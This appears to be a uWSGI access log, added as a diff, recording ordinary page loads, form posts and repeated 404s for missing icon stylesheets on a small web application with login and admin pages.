+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1371/1718] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:46:25 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 25 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1372/1719] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:46:25 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1373/1720] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:46:25 2021] GET /static/css/spinners.css => generated 3516 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1374/1721] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:46:25 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1376/1722] 180.160.49.168 () {48 vars in 976 bytes} [Thu Jan 14 10:47:01 2021] POST /kind-manage/ => generated 27 bytes in 23 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1376/1723] 180.160.49.168 () {40 vars in 894 bytes} [Thu Jan 14 10:47:01 2021] GET /kind-manage/? => generated 8310 bytes in 35 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1377/1724] 180.160.49.168 () {40 vars in 893 bytes} [Thu Jan 14 10:47:02 2021] GET /kind-manage/ => generated 8310 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1378/1725] 180.160.49.168 () {38 vars in 835 bytes} [Thu Jan 14 10:47:02 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1379/1726] 180.160.49.168 () {38 vars in 847 bytes} [Thu Jan 14 10:47:02 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1380/1727] 180.160.49.168 () {38 vars in 839 bytes} [Thu Jan 14 10:47:02 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1381/1728] 180.160.49.168 () {38 vars in 803 bytes} [Thu Jan 14 10:47:02 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1382/1729] 180.160.49.168 () {38 vars in 823 bytes} [Thu Jan 14 10:47:02 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1383/1730] 180.160.49.168 () {38 vars in 769 bytes} [Thu Jan 14 10:47:02 2021] GET /static/css/animate.css => generated 3513 bytes in 35 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1384/1731] 180.160.49.168 () {38 vars in 823 bytes} [Thu Jan 14 10:47:02 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1385/1732] 180.160.49.168 () {38 vars in 879 bytes} [Thu Jan 14 10:47:02 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1386/1733] 180.160.49.168 () {38 vars in 771 bytes} [Thu Jan 14 10:47:02 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1387/1734] 219.228.146.135 () {38 vars in 865 bytes} [Thu Jan 14 10:47:32 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1735] 219.228.146.135 () {40 vars in 865 bytes} [Thu Jan 14 10:47:32 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1736] 219.228.146.135 () {40 vars in 887 bytes} [Thu Jan 14 10:47:32 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1737] 219.228.146.135 () {40 vars in 869 bytes} [Thu Jan 14 10:47:32 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1738] 219.228.146.135 () {40 vars in 867 bytes} [Thu Jan 14 10:47:32 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1739] 219.228.146.135 () {40 vars in 873 bytes} [Thu Jan 14 10:47:32 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1740] 219.228.146.135 () {40 vars in 848 bytes} [Thu Jan 14 10:47:32 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1741] 219.228.146.135 () {40 vars in 845 bytes} [Thu Jan 14 10:47:32 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1742] 219.228.146.135 () {40 vars in 864 bytes} [Thu Jan 14 10:47:33 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1743] 219.228.146.135 () {40 vars in 862 bytes} [Thu Jan 14 10:47:33 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1744] 219.228.146.135 () {40 vars in 854 bytes} [Thu Jan 14 10:47:33 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1745] 219.228.146.135 () {40 vars in 908 bytes} [Thu Jan 14 10:47:33 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: 0|req: 1389/1746] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:47:38 2021] GET /kind-manage/? => generated 8310 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1389/1747] 180.160.49.168 () {48 vars in 977 bytes} [Thu Jan 14 10:47:38 2021] POST /kind-manage/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1390/1748] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:47:38 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1391/1749] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:47:38 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1392/1750] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:47:38 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1393/1751] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:47:38 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1394/1752] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:47:38 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1395/1753] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:47:38 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 32 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1396/1754] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:47:38 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1397/1755] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:47:38 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1398/1756] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:47:38 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1399/1757] 219.228.146.135 () {40 vars in 921 bytes} [Thu Jan 14 10:47:38 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1400/1758] 219.228.146.135 () {48 vars in 1018 bytes} [Thu Jan 14 10:47:42 2021] POST /my-admin/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1401/1759] 219.228.146.135 () {40 vars in 928 bytes} [Thu Jan 14 10:47:42 2021] GET /admin-home/ => generated 6515 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: -1|req: -1/1760] 219.228.146.135 () {40 vars in 928 bytes} [Thu Jan 14 10:47:42 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1761] 219.228.146.135 () {40 vars in 862 bytes} [Thu Jan 14 10:47:42 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1762] 219.228.146.135 () {40 vars in 874 bytes} [Thu Jan 14 10:47:42 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1763] 219.228.146.135 () {40 vars in 891 bytes} [Thu Jan 14 10:47:42 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1764] 219.228.146.135 () {40 vars in 903 bytes} [Thu Jan 14 10:47:42 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1765] 219.228.146.135 () {40 vars in 909 bytes} [Thu Jan 14 10:47:42 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1402/1766] 219.228.146.135 () {38 vars in 886 bytes} [Thu Jan 14 10:47:42 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1403/1767] 219.228.146.135 () {38 vars in 898 bytes} [Thu Jan 14 10:47:42 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1404/1768] 219.228.146.135 () {38 vars in 890 bytes} [Thu Jan 14 10:47:42 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1405/1769] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:47:42 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1406/1770] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:47:42 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1407/1771] 219.228.146.135 () {38 vars in 854 bytes} [Thu Jan 14 10:47:42 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 23 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1408/1772] 219.228.146.135 () {38 vars in 822 bytes} [Thu Jan 14 10:47:42 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1409/1773] 219.228.146.135 () {38 vars in 820 bytes} [Thu Jan 14 10:47:42 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1410/1774] 219.228.146.135 () {38 vars in 930 bytes} [Thu Jan 14 10:47:42 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1775] 219.228.146.135 () {40 vars in 843 bytes} [Thu Jan 14 10:47:42 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1776] 219.228.146.135 () {40 vars in 855 bytes} [Thu Jan 14 10:47:42 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1777] 219.228.146.135 () {40 vars in 931 bytes} [Thu Jan 14 10:47:42 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: 0|req: 1411/1778] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 10:47:43 2021] GET /kind-manage/ => generated 9252 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1412/1779] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:47:43 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: -1|req: -1/1780] 219.228.146.135 () {40 vars in 867 bytes} [Thu Jan 14 10:47:43 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1781] 219.228.146.135 () {40 vars in 927 bytes} [Thu Jan 14 10:47:43 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1782] 219.228.146.135 () {40 vars in 853 bytes} [Thu Jan 14 10:47:43 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1413/1783] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:47:43 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1414/1784] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:47:43 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1415/1785] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:47:43 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1416/1786] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:47:43 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1417/1787] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:47:43 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 18 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1418/1788] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:47:43 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1419/1789] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:47:43 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1420/1790] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:47:43 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1421/1791] 219.228.146.135 () {40 vars in 934 bytes} [Thu Jan 14 10:47:45 2021] GET /announcement/ => generated 7421 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1422/1792] 219.228.146.135 () {38 vars in 886 bytes} [Thu Jan 14 10:47:45 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1423/1793] 219.228.146.135 () {38 vars in 898 bytes} [Thu Jan 14 10:47:45 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1424/1794] 219.228.146.135 () {38 vars in 890 bytes} [Thu Jan 14 10:47:45 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1425/1795] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:47:45 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1426/1796] 219.228.146.135 () {38 vars in 854 bytes} [Thu Jan 14 10:47:45 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1427/1797] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:47:45 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 26 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1428/1798] 219.228.146.135 () {38 vars in 822 bytes} [Thu Jan 14 10:47:45 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1429/1799] 219.228.146.135 () {38 vars in 930 bytes} [Thu Jan 14 10:47:45 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1430/1800] 219.228.146.135 () {38 vars in 820 bytes} [Thu Jan 14 10:47:45 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1431/1801] 219.228.146.135 () {40 vars in 934 bytes} [Thu Jan 14 10:47:46 2021] GET /kind-manage/ => generated 9252 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1432/1802] 219.228.146.135 () {38 vars in 886 bytes} [Thu Jan 14 10:47:46 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1433/1803] 219.228.146.135 () {38 vars in 890 bytes} [Thu Jan 14 10:47:46 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1434/1804] 219.228.146.135 () {38 vars in 898 bytes} [Thu Jan 14 10:47:46 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1435/1805] 219.228.146.135 () {38 vars in 854 bytes} [Thu Jan 14 10:47:46 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1436/1806] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:47:46 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1437/1807] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:47:46 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1438/1808] 219.228.146.135 () {38 vars in 930 bytes} [Thu Jan 14 10:47:47 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1439/1809] 219.228.146.135 () {38 vars in 822 bytes} [Thu Jan 14 10:47:47 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1440/1810] 219.228.146.135 () {38 vars in 820 bytes} [Thu Jan 14 10:47:47 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1441/1811] 219.228.146.135 () {38 vars in 822 bytes} [Thu Jan 14 10:47:54 2021] GET /static/css/spinners.css => generated 3516 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1442/1812] 219.228.146.135 () {40 vars in 921 bytes} [Thu Jan 14 10:47:57 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1443/1813] 219.228.146.135 () {40 vars in 918 bytes} [Thu Jan 14 10:47:59 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1444/1814] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 10:48:07 2021] POST /login/ => generated 82 bytes in 7 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0)
